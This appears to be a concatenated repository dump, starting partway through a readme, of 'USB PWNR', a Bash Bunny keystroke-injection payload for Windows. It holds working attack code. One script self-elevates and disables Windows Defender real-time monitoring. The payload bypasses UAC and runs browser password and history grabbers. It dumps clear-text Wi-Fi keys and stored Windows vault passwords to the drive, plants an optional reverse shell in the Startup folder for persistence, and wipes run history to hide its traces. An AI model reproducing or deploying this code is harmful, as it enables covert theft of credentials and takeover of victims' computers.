Windows 10 Home, Service Pack: 0 47 | 48 | User logged In: DESKTOP-9BVPPVN\aknem 49 | 50 | Last Reboot: 02/21/2017 19:49:30 51 | 52 | Computers MAC adress: **************** 53 | 54 | Computers IP adress: *********** 55 | 56 | Public IP adress: **************** 57 | 58 | RDP: RDP is NOT enabled 59 | 60 | 61 | | ProfileName | SSID | Password | 62 | | ---------------- | ------------------------------------- | ------------------------------------- | 63 | | privatsna11234 | privatsna11234 | ******** | 64 | | privatsna11234 | privatsna11234 | ******** | 65 | 66 | 67 | 68 | ## Configuration 69 | 70 | Made for windows. The only thing you will need to change is the Ducky language so it matches the keyboard input. 71 | 72 | ## STATUS 73 | 74 | | LED | Status | 75 | | ---------------- | ------------------------------------- | 76 | | Purple (blinking)| Attack in progress | 77 | | Green | Attack Finished | 78 | 79 | 80 | 81 | ## Discussion (Not yet created) 82 | [Hak5 Forum Thread not yet created](https://forums.hak5.org/index.php?/topic/ "Hak5 Forum Thread") 83 | -------------------------------------------------------------------------------- /USB-PWNR -SLOW/Payloads - Readme's/readme-reverse-shell.md: -------------------------------------------------------------------------------- 1 | # Reverse-Shell 2 | 3 | * Author: speedy22013 4 | * Creds: speedy22013 5 | * Target: Windows 6 | 7 | ## Description 8 | 9 | Copy's the file servicehost.txt to startup directory: shell:startup and executes it. 10 | 11 | ##Configruation 12 | #Place a file servicehost.whatever in Bashbunny/payloads 13 | #Replace the text: servicehost.txt in payload.txt as well as in the copy-reverse.txt file with servicehost.whatever 14 | #(Whatever) = the filetype you have selected as your reverse shell 15 | 16 | 17 | | LED | Status | 18 | | ------------------ | -------------------------------------------- | 19 | | Amber | Attack Setup | 20 | | Green | Attack Complete | 21 | 22 | #No discussion jet! 23 | 24 | -------------------------------------------------------------------------------- /USB-PWNR -SLOW/readme.md: -------------------------------------------------------------------------------- 1 | # USB PWNR SLOW (THIS PROJECT HAS BEEN SHUT DOWN!) 2 | 3 | The slower version that was originally in this location has been terminated due to the reasons below: 4 | 5 | This (SLOW mode) is now a optional feature that you can configure in the configuration area on the V2 of the USB PWNR payload 6 | 7 | Link to V2: 8 | 9 | # https://github.com/CIPH3R0/BashBunny/tree/master/USB-PWNR 10 | -------------------------------------------------------------------------------- /USB-PWNR/Clean.ps1: -------------------------------------------------------------------------------- 1 | -WindowStyle Hidden -Exec Bypass "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue" -------------------------------------------------------------------------------- /USB-PWNR/GetDrive.ps1: -------------------------------------------------------------------------------- 1 | (gwmi -class win32_volume -filter "label='BashBunny'").Name | Clip -------------------------------------------------------------------------------- /USB-PWNR/Payloads-Readme-s/payload-files.txt: -------------------------------------------------------------------------------- 1 | You can find the origional payload files at: 2 | 3 | BPG: https://github.com/CIPH3R0/BashBunny/tree/master/BPG 4 | 5 | BHG: https://github.com/CIPH3R0/BashBunny/tree/master/BHG 6 | 7 | InfoGrabber: https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/recon/InfoGrabber 8 | 9 | Reverse-shell: https://github.com/CIPH3R0/BashBunny/tree/master/Reverse-Shell 10 | -------------------------------------------------------------------------------- /USB-PWNR/Payloads-Readme-s/readme-BHG.md: -------------------------------------------------------------------------------- 1 | # BPG (BrowserHistoryGrabber) 2 | 3 | * Author: speedy22013 4 | * Creds: speedy22013, Nirsoft 5 | * Target: Windows 6 | 7 | ## Description 8 | 9 | Grabs history from web browsers: Internet Explorer, Mozilla Firefox, Google Chrome, Safari, and Opera. 10 | This payload is quick and takes about 15 seconds after insertion 11 | 12 | #No configuration needed 13 | 14 | 15 | | LED | Status | 16 | | ------------------ | -------------------------------------------- | 17 | | Amber | Attack Setup | 18 | | Green | Attack Complete | 19 | 20 | #No discussion jet! 21 | 22 | -------------------------------------------------------------------------------- /USB-PWNR/Payloads-Readme-s/readme-BPG.md: -------------------------------------------------------------------------------- 1 | # BPG (BrowserPasswordGrabber) 2 | 3 | * Author: speedy22013 4 | * Creds: speedy22013, Nirsoft 5 | * Target: Windows 6 | 7 | ## Description 8 | 9 | Grabs passwords from web browsers: Internet Explorer, Mozilla Firefox, Google Chrome, Safari, and Opera. 10 | This payload is quick and takes about 15 seconds after insertion 11 | 12 | #No configuration needed 13 | 14 | 15 | | LED | Status | 16 | | ------------------ | -------------------------------------------- | 17 | | Amber | Attack Setup | 18 | | Green | Attack Complete | 19 | 20 | #No discussion jet! 21 | 22 | -------------------------------------------------------------------------------- /USB-PWNR/Payloads-Readme-s/readme-InfoGrabber.md: -------------------------------------------------------------------------------- 1 | # Info Grabber for the BashBunny 2 | 3 | Original Author Simen Kjeserud 4 | 5 | V2.0 Author: DannyK999 6 | 7 | Version: Version 2.0 8 | 9 | Credit: Hak5Darren, Hak5 and Simen Kjeserud for inspiration 10 | 11 | 12 | ((`\ 13 | ___ \\ '--._ 14 | .'` `' o ) 15 | / \ '. __.' 16 | _| /_ \ \_\_ 17 | {_\______\-'\__\_\ 18 | Check out Simen's website: 19 | aknemis.com 20 | 21 | ## Description 22 | 23 | Gather a lot of information about the computer and place it in a text file in loot/info/. 24 | 25 | Updates include code/output cleanup, faster runtime, and more veiled execution. 26 | 27 | Here you can se what it will look like: 28 | 29 | 30 | System Information for: DESKTOP-9BVPPVN 31 | 32 | Manufacturer: Dell Inc. 33 | 34 | Model: XPS 13 9360 35 | 36 | Serial Number: ******* 37 | 38 | CPU: Intel(R) Core(TM) i7-7500U CPU @ 2.70GHz 39 | 40 | HDD Capacity: 464.38GB 41 | 42 | HDD Space: 82.32 % Free (382.28GB) 43 | 44 | RAM: 15.89GB 45 | 46 | Operating System: Microsoft Windows 10 Home, Service Pack: 0 47 | 48 | User logged In: DESKTOP-9BVPPVN\aknem 49 | 50 | Last Reboot: 02/21/2017 19:49:30 51 | 52 | Computers MAC adress: **************** 53 | 54 | Computers IP adress: *********** 55 | 56 | Public IP adress: **************** 57 | 58 | RDP: RDP is NOT enabled 59 | 60 | 61 | | ProfileName | SSID | Password | 62 | | ---------------- | ------------------------------------- | ------------------------------------- | 63 | | privatsna11234 | privatsna11234 | ******** | 64 | | privatsna11234 | privatsna11234 | ******** | 65 | 66 | 67 | 68 | ## Configuration 69 | 70 | Made for windows. The only thing you will need to change is the Ducky language so it matches the keyboard input. 71 | 72 | ## STATUS 73 | 74 | | LED | Status | 75 | | ---------------- | ------------------------------------- | 76 | | Purple (blinking)| Attack in progress | 77 | | Green | Attack Finished | 78 | 79 | 80 | 81 | ## Discussion (Not yet created) 82 | [Hak5 Forum Thread not yet created](https://forums.hak5.org/index.php?/topic/ "Hak5 Forum Thread") 83 | -------------------------------------------------------------------------------- /USB-PWNR/Payloads-Readme-s/readme-reverse-shell.md: -------------------------------------------------------------------------------- 1 | # Reverse-Shell 2 | 3 | * Author: speedy22013 4 | * Creds: speedy22013 5 | * Target: Windows 6 | 7 | ## Description 8 | 9 | Copy's the file servicehost.txt to startup directory: shell:startup and executes it. 10 | 11 | ##Configruation 12 | #Place a file servicehost.whatever in Bashbunny/payloads 13 | #Replace the text: servicehost.txt in payload.txt as well as in the copy-reverse.txt file with servicehost.whatever 14 | #(Whatever) = the filetype you have selected as your reverse shell 15 | 16 | 17 | | LED | Status | 18 | | ------------------ | -------------------------------------------- | 19 | | Amber | Attack Setup | 20 | | Green | Attack Complete | 21 | 22 | #No discussion jet! 23 | 24 | -------------------------------------------------------------------------------- /USB-PWNR/disable-anti-virus.ps1: -------------------------------------------------------------------------------- 1 | if (!([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")) { Start-Process powershell.exe "-NoProfile -ExecutionPolicy Bypass -File `"$PSCommandPath`"" -Verb RunAs; exit } 2 | 3 | Set-MpPreference -DisableRealtimeMonitoring $true -------------------------------------------------------------------------------- /USB-PWNR/info.ps1: -------------------------------------------------------------------------------- 1 | # Shows details of currently running PC 2 | # Simen Kjeserud (Original creator), Gachnang, DannyK999 (Version 2.0) 3 | 4 | #Get info about pc 5 | 6 | # Get IP / Nework Info 7 | try 8 | { 9 | $computerPubIP=(Invoke-WebRequest ipinfo.io/ip -UseBasicParsing).Content 10 | } 11 | catch 12 | { 13 | $computerPubIP="Error getting Public IP" 14 | } 15 | $computerIP = get-WmiObject Win32_NetworkAdapterConfiguration|Where {$_.Ipaddress.length -gt 1} 16 | $IsDHCPEnabled = $false 17 | $Networks = Get-WmiObject Win32_NetworkAdapterConfiguration -Filter "DHCPEnabled=$True" | ? {$_.IPEnabled} 18 | foreach ($Network in $Networks) { 19 | If($network.DHCPEnabled) { 20 | $IsDHCPEnabled = $true 21 | } 22 | [string[]]$computerMAC =$Network.MACAddress 23 | } 24 | 25 | #Get System Info 26 | $computerSystem = Get-CimInstance CIM_ComputerSystem 27 | $computerBIOS = Get-CimInstance CIM_BIOSElement 28 | 29 | $computerOs=Get-WmiObject win32_operatingsystem | select Caption, CSName, Version, @{Name="InstallDate";Expression={([WMI]'').ConvertToDateTime($_.InstallDate)}} , @{Name="LastBootUpTime";Expression={([WMI]'').ConvertToDateTime($_.LastBootUpTime)}}, @{Name="LocalDateTime";Expression={([WMI]'').ConvertToDateTime($_.LocalDateTime)}}, CurrentTimeZone, CountryCode, OSLanguage, SerialNumber, WindowsDirectory | Format-List 30 | $computerCpu=Get-WmiObject Win32_Processor | select DeviceID, Name, Caption, Manufacturer, MaxClockSpeed, L2CacheSize, L2CacheSpeed, L3CacheSize, L3CacheSpeed | Format-List 31 | $computerMainboard=Get-WmiObject Win32_BaseBoard | Format-List 32 | 33 | $computerRamCapacity=Get-WmiObject Win32_PhysicalMemory | Measure-Object -Property capacity -Sum | % { "{0:N1} GB" -f ($_.sum / 1GB)} 34 | $computerRam=Get-WmiObject Win32_PhysicalMemory | select DeviceLocator, @{Name="Capacity";Expression={ "{0:N1} GB" -f ($_.Capacity / 1GB)}}, ConfiguredClockSpeed, ConfiguredVoltage | Format-Table 35 | 36 | # Get HDDs 37 | $driveType = @{ 38 | 2="Removable disk " 39 | 3="Fixed local disk " 40 | 4="Network disk " 41 | 5="Compact disk "} 42 | $Hdds = Get-WmiObject Win32_LogicalDisk | select DeviceID, VolumeName, @{Name="DriveType";Expression={$driveType.item([int]$_.DriveType)}}, FileSystem,VolumeSerialNumber,@{Name="Size_GB";Expression={"{0:N1} GB" -f ($_.Size / 1Gb)}}, @{Name="FreeSpace_GB";Expression={"{0:N1} GB" -f ($_.FreeSpace / 1Gb)}}, @{Name="FreeSpace_percent";Expression={"{0:N1}%" -f ((100 / ($_.Size / $_.FreeSpace)))}} | Format-Table DeviceID, VolumeName,DriveType,FileSystem,VolumeSerialNumber,@{ Name="Size GB"; Expression={$_.Size_GB}; align="right"; }, @{ Name="FreeSpace GB"; Expression={$_.FreeSpace_GB}; align="right"; }, @{ Name="FreeSpace %"; Expression={$_.FreeSpace_percent}; align="right"; } 43 | 44 | # Check RDP 45 | $RDP 46 | if ((Get-ItemProperty "hklm:\System\CurrentControlSet\Control\Terminal Server").fDenyTSConnections -eq 0) { 47 | $RDP = "RDP is Enabled" 48 | } else { 49 | $RDP = "RDP is NOT enabled" 50 | } 51 | 52 | # Get Network Interfaces 53 | $Network = Get-WmiObject Win32_NetworkAdapterConfiguration | where { $_.MACAddress -notlike $null } | select Index, Description, IPAddress, DefaultIPGateway, MACAddress | Format-Table Index, Description, IPAddress, DefaultIPGateway, MACAddress 54 | 55 | # Get wifi SSIDs and Passwords 56 | $WLANProfileNames =@() 57 | #Get all the WLAN profile names 58 | $Output = netsh.exe wlan show profiles | Select-String -pattern " : " 59 | #Trim the output to receive only the name 60 | Foreach($WLANProfileName in $Output){ 61 | $WLANProfileNames += (($WLANProfileName -split ":")[1]).Trim() 62 | } 63 | $WLANProfileObjects =@() 64 | #Bind the WLAN profile names and also the password to a custom object 65 | Foreach($WLANProfileName in $WLANProfileNames){ 66 | #get the output for the specified profile name and trim the output to receive the password if there is no password it will inform the user 67 | try{ 68 | $WLANProfilePassword = (((netsh.exe wlan show profiles name="$WLANProfileName" key=clear | select-string -Pattern "Key Content") -split ":")[1]).Trim() 69 | }Catch{ 70 | $WLANProfilePassword = "The password is not stored in this profile" 71 | } 72 | #Build the object and add this to an array 73 | $WLANProfileObject = New-Object PSCustomobject 74 | $WLANProfileObject | Add-Member -Type NoteProperty -Name "ProfileName" -Value $WLANProfileName 75 | $WLANProfileObject | Add-Member -Type NoteProperty -Name "ProfilePassword" -Value $WLANProfilePassword 76 | $WLANProfileObjects += $WLANProfileObject 77 | Remove-Variable WLANProfileObject 78 | } 79 | 80 | # local-user 81 | $luser=Get-WmiObject -Class Win32_UserAccount | Format-Table Caption, Domain, Name, FullName, SID 82 | 83 | # process first 84 | $process=Get-WmiObject win32_process | select Handle, ProcessName, ExecutablePath, CommandLine 85 | 86 | # Get Listeners / ActiveTcpConnections 87 | $listener = Get-NetTCPConnection | select @{Name="LocalAddress";Expression={$_.LocalAddress + ":" + $_.LocalPort}}, @{Name="RemoteAddress";Expression={$_.RemoteAddress + ":" + $_.RemotePort}}, State, AppliedSetting, OwningProcess 88 | $listener = $listener | foreach-object { 89 | $listenerItem = $_ 90 | $processItem = ($process | where { [int]$_.Handle -like [int]$listenerItem.OwningProcess }) 91 | new-object PSObject -property @{ 92 | "LocalAddress" = $listenerItem.LocalAddress 93 | "RemoteAddress" = $listenerItem.RemoteAddress 94 | "State" = $listenerItem.State 95 | "AppliedSetting" = $listenerItem.AppliedSetting 96 | "OwningProcess" = $listenerItem.OwningProcess 97 | "ProcessName" = $processItem.ProcessName 98 | } 99 | } | select LocalAddress, RemoteAddress, State, AppliedSetting, OwningProcess, ProcessName | Sort-Object LocalAddress | Format-Table 100 | 101 | # process last 102 | $process = $process | Sort-Object ProcessName | Format-Table Handle, ProcessName, ExecutablePath, CommandLine 103 | 104 | # service 105 | $service=Get-WmiObject win32_service | select State, Name, DisplayName, PathName, @{Name="Sort";Expression={$_.State + $_.Name}} | Sort-Object Sort | Format-Table State, Name, DisplayName, PathName 106 | 107 | # installed software (get uninstaller) 108 | $software=Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | where { $_.DisplayName -notlike $null } | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Sort-Object DisplayName | Format-Table -AutoSize 109 | 110 | # drivers 111 | $drivers=Get-WmiObject Win32_PnPSignedDriver| where { $_.DeviceName -notlike $null } | select DeviceName, FriendlyName, DriverProviderName, DriverVersion 112 | 113 | # videocard 114 | $videocard=Get-WmiObject Win32_VideoController | Format-Table Name, VideoProcessor, DriverVersion, CurrentHorizontalResolution, CurrentVerticalResolution 115 | 116 | #Get stored passwords 117 | [void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime] 118 | $vault = New-Object Windows.Security.Credentials.PasswordVault 119 | $vault = $vault.RetrieveAll() | % { $_.RetrievePassword();$_ } 120 | 121 | #The output 122 | Clear-Host 123 | Write-Host 124 | 125 | $computerSystem.Name 126 | "==================================================================" 127 | "Manufacturer: " + $computerSystem.Manufacturer 128 | "Model: " + $computerSystem.Model 129 | "Serial Number: " + $computerBIOS.SerialNumber 130 | "" 131 | "" 132 | "" 133 | 134 | "OS:" 135 | "=================================================================="+ ($computerOs| out-string) 136 | 137 | "CPU:" 138 | "=================================================================="+ ($computerCpu| out-string) 139 | 140 | "RAM:" 141 | "==================================================================" 142 | "Capacity: " + $computerRamCapacity+ ($computerRam| out-string) 143 | 144 | "Mainboard:" 145 | "=================================================================="+ ($computerMainboard| out-string) 146 | 147 | "Bios:" 148 | "=================================================================="+ (Get-WmiObject win32_bios| out-string) 149 | 150 | 151 | 152 | "Local-user:" 153 | "=================================================================="+ ($luser| out-string) 154 | 155 | "HDDs:" 156 | "=================================================================="+ ($Hdds| out-string) 157 | 158 | "Network: " 159 | "==================================================================" 160 | "Computers MAC address: " + $computerMAC 161 | "Computers IP address: " + $computerIP.ipaddress[0] 162 | "Public IP address: " + $computerPubIP 163 | "RDP: " + $RDP 164 | "" 165 | ($Network| out-string) 166 | 167 | "W-Lan profiles: " 168 | "=================================================================="+ ($WLANProfileObjects| out-string) 169 | 170 | "listeners / ActiveTcpConnections" 171 | "=================================================================="+ ($listener| out-string) 172 | 173 | "Current running process: " 174 | "=================================================================="+ ($process| out-string) 175 | 176 | "Services: " 177 | "=================================================================="+ ($service| out-string) 178 | 179 | "Installed software:" 180 | "=================================================================="+ ($software| out-string) 181 | 182 | "Installed drivers:" 183 | "=================================================================="+ ($drivers| out-string) 184 | 185 | "Installed videocards:" 186 | "==================================================================" + ($videocard| out-string) 187 | 188 | "Windows/user passwords" 189 | "==================================================================" 190 | $vault | select Resource, UserName, Password | Sort-Object Resource | ft -AutoSize 191 | -------------------------------------------------------------------------------- /USB-PWNR/payload.txt: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | #USB PWNR 4 | #P0WNS a computer in seconds 5 | 6 | #CONFIGURATION BELOW!!! 7 | 8 | #Delay CONFIGURATION 9 | #Edit the lines below to change the standard delays in the script 10 | #SFD = Super Fast delay (waiting for CTRL v for example) FASTMODE(standard)=100 SLOWMODE=500 11 | SFD="100" 12 | #FD = Fast delay (waiting for CTRL v for example) FASTMODE(standard)=500 SLOWMODE=1000 13 | FD="500" 14 | #ND = Normal delay (waiting for programs to shut off) FASTMODE(standard)=1000 SLOWMODE=2000 15 | ND="1000" 16 | #LD = Long delay (waiting for programs to start or bash scipts to execute) FASTMODE(standard)=1500 SLOWMODE=3500 17 | LD="1500" 18 | 19 | #Reverse shell CONFIGURATION 20 | #Edit the line below to copy a reverse shell and execute it or not ("#" = Not copy/execute "" = do copy and execute) 21 | RS="#" 22 | 23 | #Target ip CONFIGURATION 24 | #Edit the line below if you want to get the targets IP ("#" = Do not save target ip "" = save target ip) 25 | TP="#" 26 | 27 | #Shutting off CONFIGURATION 28 | #Edit the line below to shut the bunny off after finishing ("" = turn off / "#" = Do not turn off) 29 | AM="#" 30 | 31 | #Editing text below this line may prevent the script from working! 32 | 33 | #Setup 34 | LED SETUP 35 | ATTACKMODE HID STORAGE 36 | GET SWITCH_POSITION 37 | GET TARGET_IP 38 | #Wait for the computer to recognise the drive etc 39 | Q delay $LD 40 | Q delay $LD 41 | Q delay $LD 42 | #Disable AntiVirus (Windows Defender) 43 | RUN WIN Powershell -nop -ex Bypass -w Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\disable-anti-virus.ps1')" 44 | #Bypass UAC 45 | Q DELAY $ND 46 | Q LEFT 47 | Q ENTER 48 | #Get drive letter and copy it: 49 | RUN WIN Powershell -nop -ex Bypass -w Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\GetDrive.ps1')" 50 | Q DELAY $ND 51 | 52 | #InfoGrabber 53 | LED STAGE1 54 | RUN WIN Powershell -nop -ex Bypass -w Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\run.ps1')" 55 | DELAY $LD 56 | 57 | #BPG (BrowserPasswordGrabber) 58 | LED STAGE2 59 | RUN WIN powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\pass.exe')" 60 | Q DELAY $LD 61 | Q CONTROL a 62 | Q DELAY $FD 63 | Q CONTROL s 64 | Q DELAY $FD 65 | Q STRING %computername% - Pass 66 | Q F4 67 | Q DELAY $SFD 68 | Q CONTROL a 69 | Q DELAY $SFD 70 | Q CONTROL v 71 | Q DELAY $SFD 72 | Q STRING 'loot\USB_PWNR' 73 | Q DELAY $SFD 74 | Q ENTER 75 | Q DELAY $FD 76 | Q TAB 77 | Q TAB 78 | Q TAB 79 | Q TAB 80 | Q TAB 81 | Q TAB 82 | Q ENTER 83 | Q DELAY $SFD 84 | Q ALT F4 85 | 86 | #BHG (BrowserHistoryGrabber) 87 | LED STAGE 3 88 | RUN WIN powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\history.exe')" 89 | Q DELAY $LD 90 | Q ENTER 91 | Q DELAY $LD 92 | Q DELAY $LD 93 | Q CONTROL a 94 | Q DELAY $FD 95 | Q CONTROL s 96 | Q DELAY $FD 97 | Q STRING %computername% - History 98 | Q F4 99 | Q DELAY $SFD 100 | Q CONTROL a 101 | Q DELAY $SFD 102 | Q CONTROL v 103 | Q DELAY $SFD 104 | Q STRING 'loot\USB_PWNR' 105 | Q DELAY $SFD 106 | Q ENTER 107 | Q DELAY $FD 108 | Q TAB 109 | Q TAB 110 | Q TAB 111 | Q TAB 112 | Q TAB 113 | Q TAB 114 | Q ENTER 115 | Q DELAY $SFD 116 | Q ALT F4 117 | 118 | #Copy reverse shell file to shell:startup and start it 119 | LED STAGE4 120 | Q GUI r 121 | Q DELAY $SFD 122 | Q STRING powershell 123 | Q ENTER 124 | Q DELAY $FD 125 | $RS Q STRING copy 126 | $RS Q SPACE 127 | $RS Q CONTROL v 128 | $RS Q BACKSPACE 129 | $RS Q STRING 'payloads\servicehost.txt' "'AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'" 130 | $RS Q ENTER 131 | $RS Q DELAY $FD 132 | $RS Q STRING start "'AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\servicehost.txt'" 133 | $RS Q ENTER 134 | $RS Q DELAY $LD 135 | $RS Q DELAY $LD 136 | 137 | # Get Target IP 138 | $TP Q STRING cd 139 | $TP Q SPACE 140 | $TP Q CONTROL v 141 | $TP Q BACKSPACE 142 | $TP Q STRING '\loot' 143 | $TP Q ENTER 144 | $TP Q DELAY $SFD 145 | $TP Q STRING '$ipV4 = Test-Connection -ComputerName (hostname) -Count 1 | Select IPV4Address >>' 146 | $TP Q SPACE 147 | $TP Q CNTRL v 148 | $TP Q DELAY $SFD 149 | $TP Q BACKSPACE 150 | $TP Q STRING '\loot\USB_PWNR\ip.txt' 151 | $TP Q ENTER 152 | $TP Q DELAY $SFD 153 | Q STRING exit 154 | Q ENTER 155 | Q DELAY $SFD 156 | 157 | #Cleaning up fase 158 | LED CLEANUP 159 | RUN WIN powershell -WindowStyle Hidden -Exec Bypass "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue" 160 | Q ENTER 161 | 162 | LED FINISH 163 | $AM ATTACKMODE OFF 164 | -------------------------------------------------------------------------------- /USB-PWNR/readme.md: -------------------------------------------------------------------------------- 1 | # USB PWNR V2 2 | 3 | ````` 4 | + __ _______ ____ ____ _ ___ ______ 5 | + / / / / ___// __ ) / __ \ | / / | / / __ \ 6 | + / / / /\__ \/ __ | / /_/ / | /| / / |/ / /_/ / 7 | +/ /_/ /___/ / /_/ / / ____/| |/ |/ / /| / _, _/ 8 | +\____//____/_____/ /_/ |__/|__/_/ |_/_/ |_| 9 | 10 | ````` 11 | 12 | * Written by: C1PH3R 13 | * Creds: C1PH3R, Hak5Darren, Nirsoft 14 | * Target: Windows 15 | 16 | # Description: 17 | 18 | # Starts up multiple programs: 19 | 20 | - [x] BPG (BrowserPasswordGrabber): Grabs passwords from web browsers: Internet Explorer, Mozilla Firefox, Google Chrome, Safari, and Opera. 21 | - [x] BHG (BrowserHistoryGrabber): Grabs history from web browsers: Internet Explorer, Mozilla Firefox, Google Chrome, Safari, and Opera. 22 | - [x] InfoGrabber: Gather a lot of information about the computer and place it in a text file in loot/info/. 23 | - [x] Reverse-Shell: Copy's the file servicehost.txt to startup directory: shell:startup and executes it. 24 | - [x] Ip grabber. 25 | 26 | # Configuration: 27 | * Required: download the binary files and put them in the switch position you chose: 28 | https://github.com/CIPH3R0/BashBunny/tree/master/Binary-s/USB%20PWNR 29 | * Optional: edit the "Delay CONFIGURATION" in payload file to your preferences to make the payload work with slower/older or faster/newer computers 30 | * Optional: edit the "Shutting off CONFIGURATION" in the payload file to shut the bunny off after the payload is done 31 | * Optional: edit the "Target ip CONFIGURATION" in the payload file to grab the ip of the victim 32 | * Optional: edit the "Reverse shell CONFIGURATION" in the payload file to use reverse_shell 33 | * When using a reverse_shell follow steps below 34 | * Place a file servicehost.whatever in Bashbunny/payloads 35 | * Replace the text: servicehost.txt in payload.txt file with servicehost.whatever (Whatever = the filetype you have selected as your reverse shell) 36 | 37 | 38 | 39 | | LED | Status | 40 | | ------------------ | -------------------------------------------- | 41 | | Amber | Attack Setup | 42 | | Stage (blinking) | Bussy (do not remove stick) | 43 | | Green | Attack Complete | 44 | | Red | Fail | 45 | 46 | * No discussion jet! 47 | 48 | # "Don't look at the branch of the problem, look at the root! (C1PH3R)" 49 | -------------------------------------------------------------------------------- /USB-PWNR/run.ps1: -------------------------------------------------------------------------------- 1 | #Remove run history 2 | powershell "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue" 3 | 4 | #Get the path and file name that you are using for output 5 | # find connected bashbunny drive: 6 | $VolumeName = "bashbunny" 7 | $computerSystem = Get-CimInstance CIM_ComputerSystem 8 | $backupDrive = $null 9 | get-wmiobject win32_logicaldisk | % { 10 | if ($_.VolumeName -eq $VolumeName) { 11 | $backupDrive = $_.DeviceID 12 | } 13 | } 14 | 15 | #See if a loot folder exist in usb. If not create one 16 | $TARGETDIR = $backupDrive + "\loot" 17 | if(!(Test-Path -Path $TARGETDIR )){ 18 | New-Item -ItemType directory -Path $TARGETDIR 19 | } 20 | 21 | #See if a loot folder exist in loot folder. If not create one 22 | $TARGETDIR = $backupDrive + "\loot\info" 23 | if(!(Test-Path -Path $TARGETDIR )){ 24 | New-Item -ItemType directory -Path $TARGETDIR 25 | } 26 | 27 | #See if a USB_PWNR folder exist in loot folder. If not create one 28 | $TARGETDIR = $backupDrive + "\loot\USB_PWNR" 29 | if(!(Test-Path -Path $TARGETDIR )){ 30 | New-Item -ItemType directory -Path $TARGETDIR 31 | } 32 | 33 | #Create a path that will be used to make the file 34 | $datetime = get-date -f yyyy-MM-dd_HH-mm 35 | $backupPath = $backupDrive + "\loot\info\" + $computerSystem.Name + " - " + $datetime + ".txt" 36 | 37 | #Create output from info script 38 | $TARGETDIR = $MyInvocation.MyCommand.Path 39 | $TARGETDIR = $TARGETDIR -replace ".......$" 40 | cd $TARGETDIR 41 | PowerShell.exe -ExecutionPolicy Bypass -File info.ps1 > $backupPath 42 | --------------------------------------------------------------------------------